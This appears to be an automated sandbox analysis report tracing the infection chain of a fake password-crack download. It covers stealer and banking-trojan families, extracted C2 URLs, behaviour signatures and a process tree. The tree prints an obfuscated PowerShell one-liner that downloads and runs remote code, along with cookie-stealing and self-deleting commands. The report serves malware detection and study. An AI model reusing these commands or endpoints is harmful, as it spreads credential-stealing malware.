Analysis

  • max time kernel
    168s
  • max time network
    575s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    11-04-2021 06:15

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

icedid

Campaign

1925120085

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1228
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2704
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2664
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2352
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1864
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1332
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1152
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1064
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:804
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:372
                    • C:\Users\Admin\AppData\Local\Temp\Scoprire_Password_crack.exe
                      "C:\Users\Admin\AppData\Local\Temp\Scoprire_Password_crack.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1020
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3596
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                          keygen-pr.exe -p83fsase3Ge
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1076
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2712
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                              5⤵
                              • Executes dropped EXE
                              PID:3212
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                          keygen-step-1.exe
                          3⤵
                          • Executes dropped EXE
                          PID:3156
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                          keygen-step-3.exe
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1504
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1476
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 1.1.1.1 -n 1 -w 3000
                              5⤵
                              • Runs ping.exe
                              PID:668
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                          keygen-step-4.exe
                          3⤵
                          • Executes dropped EXE
                          • Checks computer location settings
                          • Suspicious use of WriteProcessMemory
                          PID:816
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2600
                            • C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe
                              "C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                              5⤵
                              • Executes dropped EXE
                              • Maps connected drives based on registry
                              • Drops file in Windows directory
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2004
                              • C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe
                                "C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe" 1 3.1618121762.60729422111a1 101
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4964
                                • C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Z2TTPBINTZ\multitimer.exe" 2 3.1618121762.60729422111a1
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks for any installed AV software in registry
                                  PID:208
                                  • C:\Users\Admin\AppData\Local\Temp\xh1n5v1quia\g1w31q3cirw.exe
                                    "C:\Users\Admin\AppData\Local\Temp\xh1n5v1quia\g1w31q3cirw.exe" /VERYSILENT
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4968
                                    • C:\Users\Admin\AppData\Local\Temp\is-FL9BU.tmp\g1w31q3cirw.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-FL9BU.tmp\g1w31q3cirw.tmp" /SL5="$501C2,140785,56832,C:\Users\Admin\AppData\Local\Temp\xh1n5v1quia\g1w31q3cirw.exe" /VERYSILENT
                                      9⤵
                                        PID:212
                                        • C:\Users\Admin\AppData\Local\Temp\is-RG9MU.tmp\apipostback.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-RG9MU.tmp\apipostback.exe" adan adan
                                          10⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of SetWindowsHookEx
                                          PID:6068
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ToMzWjo6P.dll"
                                            11⤵
                                              PID:1528
                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ToMzWjo6P.dll"
                                                12⤵
                                                • Loads dropped DLL
                                                PID:1476
                                                • C:\Windows\system32\regsvr32.exe
                                                  /s "C:\Users\Admin\AppData\Local\Temp\ToMzWjo6P.dll"
                                                  13⤵
                                                    PID:5024
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ToMzWjo6P.dllMwQYdmCg9.dll"
                                                11⤵
                                                  PID:4556
                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ToMzWjo6P.dllMwQYdmCg9.dll"
                                                    12⤵
                                                      PID:4440
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                    11⤵
                                                      PID:4424
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                        12⤵
                                                        • Blocklisted process makes network request
                                                        PID:6112
                                              • C:\Users\Admin\AppData\Local\Temp\e4z125c2nxt\KiffApp1.exe
                                                "C:\Users\Admin\AppData\Local\Temp\e4z125c2nxt\KiffApp1.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                PID:1076
                                              • C:\Users\Admin\AppData\Local\Temp\mx4dlyhr1rs\Setup3310.exe
                                                "C:\Users\Admin\AppData\Local\Temp\mx4dlyhr1rs\Setup3310.exe" /Verysilent /subid=577
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4212
                                                • C:\Users\Admin\AppData\Local\Temp\is-FVAS5.tmp\Setup3310.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-FVAS5.tmp\Setup3310.tmp" /SL5="$9007A,138429,56832,C:\Users\Admin\AppData\Local\Temp\mx4dlyhr1rs\Setup3310.exe" /Verysilent /subid=577
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4860
                                                  • C:\Users\Admin\AppData\Local\Temp\is-OHBUQ.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-OHBUQ.tmp\Setup.exe" /Verysilent
                                                    10⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2052
                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2660
                                                      • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                        "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:6720
                                                        • C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe
                                                          "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe"
                                                          13⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks processor information in registry
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6760
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im viqconf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Programma configurater\viqconf.exe" & del C:\ProgramData\*.dll & exit
                                                            14⤵
                                                              PID:6256
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im viqconf.exe /f
                                                                15⤵
                                                                • Kills process with taskkill
                                                                PID:4528
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                15⤵
                                                                • Delays execution with timeout.exe
                                                                PID:6156
                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                        11⤵
                                                        • Executes dropped EXE
                                                        PID:2620
                                                        • C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                          12⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Windows directory
                                                          PID:6864
                                                          • C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe" 1 3.1618121820.6072945ce816e 103
                                                            13⤵
                                                            • Adds Run key to start application
                                                            PID:188
                                                            • C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\MEYXRPFM0I\multitimer.exe" 2 3.1618121820.6072945ce816e
                                                              14⤵
                                                              • Checks for any installed AV software in registry
                                                              PID:6344
                                                              • C:\Users\Admin\AppData\Local\Temp\11rsib54zfw\ivq55vx4zfm.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\11rsib54zfw\ivq55vx4zfm.exe" /ustwo INSTALL
                                                                15⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:6496
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "ivq55vx4zfm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\11rsib54zfw\ivq55vx4zfm.exe" & exit
                                                                  16⤵
                                                                    PID:4744
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im "ivq55vx4zfm.exe" /f
                                                                      17⤵
                                                                      • Kills process with taskkill
                                                                      PID:1616
                                                                • C:\Users\Admin\AppData\Local\Temp\ykzbiofeqlm\app.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\ykzbiofeqlm\app.exe" /8-23
                                                                  15⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5984
                                                                  • C:\Users\Admin\AppData\Local\Temp\ykzbiofeqlm\app.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\ykzbiofeqlm\app.exe" /8-23
                                                                    16⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:6504
                                                                • C:\Users\Admin\AppData\Local\Temp\vh32htsblo1\Setup3310.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\vh32htsblo1\Setup3310.exe" /Verysilent /subid=577
                                                                  15⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:3876
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JHJGH.tmp\Setup3310.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JHJGH.tmp\Setup3310.tmp" /SL5="$404EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\vh32htsblo1\Setup3310.exe" /Verysilent /subid=577
                                                                    16⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5524
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-807TR.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-807TR.tmp\Setup.exe" /Verysilent
                                                                      17⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4208
                                                          • C:\Users\Admin\AppData\Local\Temp\2CL96LG6IB\setups.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\2CL96LG6IB\setups.exe" ll
                                                            12⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6928
                                                            • C:\Users\Admin\AppData\Local\Temp\is-6JQPL.tmp\setups.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-6JQPL.tmp\setups.tmp" /SL5="$6020A,2051888,270336,C:\Users\Admin\AppData\Local\Temp\2CL96LG6IB\setups.exe" ll
                                                              13⤵
                                                              • Checks computer location settings
                                                              • Loads dropped DLL
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:7032
                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe
                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe"
                                                          11⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:2252
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                            12⤵
                                                              PID:4100
                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            PID:1316
                                                            • C:\ProgramData\224496.exe
                                                              "C:\ProgramData\224496.exe"
                                                              12⤵
                                                              • Executes dropped EXE
                                                              PID:6712
                                                            • C:\ProgramData\5394499.exe
                                                              "C:\ProgramData\5394499.exe"
                                                              12⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: SetClipboardViewer
                                                              PID:6796
                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1816
                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                              "C:\Windows\System32\dllhost.exe"
                                                              12⤵
                                                                PID:6524
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                12⤵
                                                                  PID:6596
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\System32\cmd.exe
                                                                    13⤵
                                                                      PID:7016
                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                  11⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in System32 directory
                                                                  • Drops file in Windows directory
                                                                  • Checks SCSI registry key(s)
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5024
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-A6THO.tmp\lylal220.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-A6THO.tmp\lylal220.tmp" /SL5="$40208,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                    12⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2752
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-N5GT7.tmp\ysAGEL.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-N5GT7.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                      13⤵
                                                                      • Drops file in Drivers directory
                                                                      • Adds Run key to start application
                                                                      • Drops file in Program Files directory
                                                                      PID:6940
                                                                      • C:\Program Files\Windows Mail\DDZYYJUGEC\irecord.exe
                                                                        "C:\Program Files\Windows Mail\DDZYYJUGEC\irecord.exe" /VERYSILENT
                                                                        14⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1428
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-89D3U.tmp\irecord.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-89D3U.tmp\irecord.tmp" /SL5="$20386,5922518,66560,C:\Program Files\Windows Mail\DDZYYJUGEC\irecord.exe" /VERYSILENT
                                                                          15⤵
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:5216
                                                                          • C:\Program Files (x86)\i-record\i-record.exe
                                                                            "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                            16⤵
                                                                            • Loads dropped DLL
                                                                            PID:6248
                                                                      • C:\Users\Admin\AppData\Local\Temp\4c-94c4d-eed-262bc-883bbcdbe9a0e\Pucaewozhisha.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\4c-94c4d-eed-262bc-883bbcdbe9a0e\Pucaewozhisha.exe"
                                                                        14⤵
                                                                        • Checks computer location settings
                                                                        PID:4972
                                                                      • C:\Users\Admin\AppData\Local\Temp\e4-7543a-d7f-9d892-d059d9e3d9874\SHiporotepi.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\e4-7543a-d7f-9d892-d059d9e3d9874\SHiporotepi.exe"
                                                                        14⤵
                                                                          PID:6896
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yc1hsecn.pwl\gaooo.exe & exit
                                                                            15⤵
                                                                              PID:5196
                                                                              • C:\Users\Admin\AppData\Local\Temp\yc1hsecn.pwl\gaooo.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\yc1hsecn.pwl\gaooo.exe
                                                                                16⤵
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5456
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  17⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:6320
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  17⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5376
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3aakafc1.jhc\google-game.exe & exit
                                                                              15⤵
                                                                                PID:4308
                                                                                • C:\Users\Admin\AppData\Local\Temp\3aakafc1.jhc\google-game.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\3aakafc1.jhc\google-game.exe
                                                                                  16⤵
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:6576
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                    17⤵
                                                                                      PID:5964
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cuuut2w0.0lf\BarSetpFile.exe /silent & exit
                                                                                  15⤵
                                                                                    PID:6440
                                                                                    • C:\Users\Admin\AppData\Local\Temp\cuuut2w0.0lf\BarSetpFile.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\cuuut2w0.0lf\BarSetpFile.exe /silent
                                                                                      16⤵
                                                                                        PID:5464
                                                                                        • C:\ProgramData\5536542.exe
                                                                                          "C:\ProgramData\5536542.exe"
                                                                                          17⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5644
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w5u5rzwt.hcs\askinstall31.exe & exit
                                                                                      15⤵
                                                                                        PID:4700
                                                                                        • C:\Users\Admin\AppData\Local\Temp\w5u5rzwt.hcs\askinstall31.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\w5u5rzwt.hcs\askinstall31.exe
                                                                                          16⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:6444
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5iungax0.afc\toolspab1.exe & exit
                                                                                        15⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:212
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5iungax0.afc\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\5iungax0.afc\toolspab1.exe
                                                                                          16⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5040
                                                                                          • C:\Users\Admin\AppData\Local\Temp\5iungax0.afc\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\5iungax0.afc\toolspab1.exe
                                                                                            17⤵
                                                                                              PID:4344
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1zwfcag.xzg\GcleanerWW.exe /mixone & exit
                                                                                          15⤵
                                                                                            PID:5980
                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                    11⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:1112
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-Q4PDN.tmp\LabPicV3.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-Q4PDN.tmp\LabPicV3.tmp" /SL5="$2047C,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                      12⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4784
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-73CP6.tmp\alpATCHInO.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-73CP6.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                        13⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Adds Run key to start application
                                                                                        PID:7056
                                                                                        • C:\Program Files\Reference Assemblies\KLLBXLUMYI\prolab.exe
                                                                                          "C:\Program Files\Reference Assemblies\KLLBXLUMYI\prolab.exe" /VERYSILENT
                                                                                          14⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4356
